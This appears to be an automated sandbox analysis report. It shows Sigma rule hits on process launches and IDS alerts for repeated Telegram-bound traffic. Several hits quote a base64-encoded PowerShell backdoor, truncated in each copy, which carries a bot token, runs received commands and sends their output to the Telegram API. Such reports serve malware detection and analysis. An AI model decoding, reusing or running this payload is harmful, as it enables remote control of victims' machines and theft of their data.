Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAASQ
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQ
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQ
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQ
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6688, ProcessName: svchost.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-14T10:03:45.210761+010020589641A Network Trojan was detected192.168.2.549704149.154.167.220443TCP
2025-01-14T10:03:48.462922+010020589641A Network Trojan was detected192.168.2.549705149.154.167.220443TCP
2025-01-14T10:04:02.723979+010020589641A Network Trojan was detected192.168.2.549725149.154.167.220443TCP
2025-01-14T10:04:11.695646+010020589641A Network Trojan was detected192.168.2.549794149.154.167.220443TCP
2025-01-14T10:04:17.590674+010020589641A Network Trojan was detected192.168.2.564791149.154.167.220443TCP
2025-01-14T10:04:28.554435+010020589641A Network Trojan was detected192.168.2.564862149.154.167.220443TCP
2025-01-14T10:04:42.657834+010020589641A Network Trojan was detected192.168.2.564944149.154.167.220443TCP
2025-01-14T10:04:50.700050+010020589641A Network Trojan was detected192.168.2.564975149.154.167.220443TCP
2025-01-14T10:05:00.628281+010020589641A Network Trojan was detected192.168.2.564976149.154.167.220443TCP
2025-01-14T10:05:06.500484+010020589641A Network Trojan was detected192.168.2.564977149.154.167.220443TCP
2025-01-14T10:05:09.434763+010020589641A Network Trojan was detected192.168.2.564978149.154.167.220443TCP
2025-01-14T10:05:12.303603+010020589641A Network Trojan was detected192.168.2.564979149.154.167.220443TCP
2025-01-14T10:05:17.906176+010020589641A Network Trojan was detected192.168.2.564980149.154.167.220443TCP
2025-01-14T10:05:24.946423+010020589641A Network Trojan was detected192.168.2.564981149.154.167.220443TCP
2025-01-14T10:05:33.800975+010020589641A Network Trojan was detected192.168.2.564982149.154.167.220443TCP
2025-01-14T10:05:36.807885+010020589641A Network Trojan was detected192.168.2.564983149.154.167.220443TCP
2025-01-14T10:05:39.687968+010020589641A Network Trojan was detected192.168.2.564984149.154.167.220443TCP
2025-01-14T10:05:45.598094+010020589641A Network Trojan was detected192.168.2.564985149.154.167.220443TCP
2025-01-14T10:05:50.635229+010020589641A Network Trojan was detected192.168.2.564986149.154.167.220443TCP
2025-01-14T10:06:03.686867+010020589641A Network Trojan was detected192.168.2.564987149.154.167.220443TCP
2025-01-14T10:06:05.631751+010020589641A Network Trojan was detected192.168.2.564988149.154.167.220443TCP
2025-01-14T10:06:08.881366+010020589641A Network Trojan was detected192.168.2.564989149.154.167.220443TCP
2025-01-14T10:06:19.882827+010020589641A Network Trojan was detected192.168.2.564990149.154.167.220443TCP
2025-01-14T10:06:20.935845+010020589641A Network Trojan was detected192.168.2.564991149.154.167.220443TCP
2025-01-14T10:06:35.060683+010020589641A Network Trojan was detected192.168.2.564992149.154.167.220443TCP
2025-01-14T10:06:40.934228+010020589641A Network Trojan was detected192.168.2.564993149.154.167.220443TCP
2025-01-14T10:06:43.848963+010020589641A Network Trojan was detected192.168.2.564994149.154.167.220443TCP
2025-01-14T10:06:46.724880+010020589641A Network Trojan was detected192.168.2.564995149.154.167.220443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-14T10:03:48.462922+010028032742Potentially Bad Traffic192.168.2.549705149.154.167.220443TCP
2025-01-14T10:04:02.723979+010028032742Potentially Bad Traffic192.168.2.549725149.154.167.220443TCP
2025-01-14T10:04:11.695646+010028032742Potentially Bad Traffic192.168.2.549794149.154.167.220443TCP
2025-01-14T10:04:17.590674+010028032742Potentially Bad Traffic192.168.2.564791149.154.167.220443TCP
2025-01-14T10:04:28.554435+010028032742Potentially Bad Traffic192.168.2.564862149.154.167.220443TCP
2025-01-14T10:04:42.657834+010028032742Potentially Bad Traffic192.168.2.564944149.154.167.220443TCP
2025-01-14T10:04:50.700050+010028032742Potentially Bad Traffic192.168.2.564975149.154.167.220443TCP
2025-01-14T10:05:00.628281+010028032742Potentially Bad Traffic192.168.2.564976149.154.167.220443TCP
2025-01-14T10:05:06.500484+010028032742Potentially Bad Traffic192.168.2.564977149.154.167.220443TCP
2025-01-14T10:05:09.434763+010028032742Potentially Bad Traffic192.168.2.564978149.154.167.220443TCP
2025-01-14T10:05:12.303603+010028032742Potentially Bad Traffic192.168.2.564979149.154.167.220443TCP
2025-01-14T10:05:17.906176+010028032742Potentially Bad Traffic192.168.2.564980149.154.167.220443TCP
2025-01-14T10:05:24.946423+010028032742Potentially Bad Traffic192.168.2.564981149.154.167.220443TCP
2025-01-14T10:05:33.800975+010028032742Potentially Bad Traffic192.168.2.564982149.154.167.220443TCP
2025-01-14T10:05:36.807885+010028032742Potentially Bad Traffic192.168.2.564983149.154.167.220443TCP
2025-01-14T10:05:39.687968+010028032742Potentially Bad Traffic192.168.2.564984149.154.167.220443TCP
2025-01-14T10:05:45.598094+010028032742Potentially Bad Traffic192.168.2.564985149.154.167.220443TCP
2025-01-14T10:05:50.635229+010028032742Potentially Bad Traffic192.168.2.564986149.154.167.220443TCP
2025-01-14T10:06:03.686867+010028032742Potentially Bad Traffic192.168.2.564987149.154.167.220443TCP
2025-01-14T10:06:05.631751+010028032742Potentially Bad Traffic192.168.2.564988149.154.167.220443TCP
2025-01-14T10:06:08.881366+010028032742Potentially Bad Traffic192.168.2.564989149.154.167.220443TCP
2025-01-14T10:06:19.882827+010028032742Potentially Bad Traffic192.168.2.564990149.154.167.220443TCP
2025-01-14T10:06:20.935845+010028032742Potentially Bad Traffic192.168.2.564991149.154.167.220443TCP
2025-01-14T10:06:35.060683+010028032742Potentially Bad Traffic192.168.2.564992149.154.167.220443TCP
2025-01-14T10:06:40.934228+010028032742Potentially Bad Traffic192.168.2.564993149.154.167.220443TCP
2025-01-14T10:06:43.848963+010028032742Potentially Bad Traffic192.168.2.564994149.154.167.220443TCP
2025-01-14T10:06:46.724880+010028032742Potentially Bad Traffic192.168.2.564995149.154.167.220443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-14T10:03:45.210761+010018100002Potentially Bad Traffic192.168.2.549704149.154.167.220443TCP
2025-01-14T10:03:48.462922+010018100002Potentially Bad Traffic192.168.2.549705149.154.167.220443TCP
2025-01-14T10:04:02.723979+010018100002Potentially Bad Traffic192.168.2.549725149.154.167.220443TCP
2025-01-14T10:04:11.695646+010018100002Potentially Bad Traffic192.168.2.549794149.154.167.220443TCP
2025-01-14T10:04:17.590674+010018100002Potentially Bad Traffic192.168.2.564791149.154.167.220443TCP
2025-01-14T10:04:28.554435+010018100002Potentially Bad Traffic192.168.2.564862149.154.167.220443TCP
2025-01-14T10:04:42.657834+010018100002Potentially Bad Traffic192.168.2.564944149.154.167.220443TCP
2025-01-14T10:04:50.700050+010018100002Potentially Bad Traffic192.168.2.564975149.154.167.220443TCP
2025-01-14T10:05:00.628281+010018100002Potentially Bad Traffic192.168.2.564976149.154.167.220443TCP
2025-01-14T10:05:06.500484+010018100002Potentially Bad Traffic192.168.2.564977149.154.167.220443TCP
2025-01-14T10:05:09.434763+010018100002Potentially Bad Traffic192.168.2.564978149.154.167.220443TCP
2025-01-14T10:05:12.303603+010018100002Potentially Bad Traffic192.168.2.564979149.154.167.220443TCP
2025-01-14T10:05:17.906176+010018100002Potentially Bad Traffic192.168.2.564980149.154.167.220443TCP
2025-01-14T10:05:24.946423+010018100002Potentially Bad Traffic192.168.2.564981149.154.167.220443TCP
2025-01-14T10:05:33.800975+010018100002Potentially Bad Traffic192.168.2.564982149.154.167.220443TCP
2025-01-14T10:05:36.807885+010018100002Potentially Bad Traffic192.168.2.564983149.154.167.220443TCP
2025-01-14T10:05:39.687968+010018100002Potentially Bad Traffic192.168.2.564984149.154.167.220443TCP
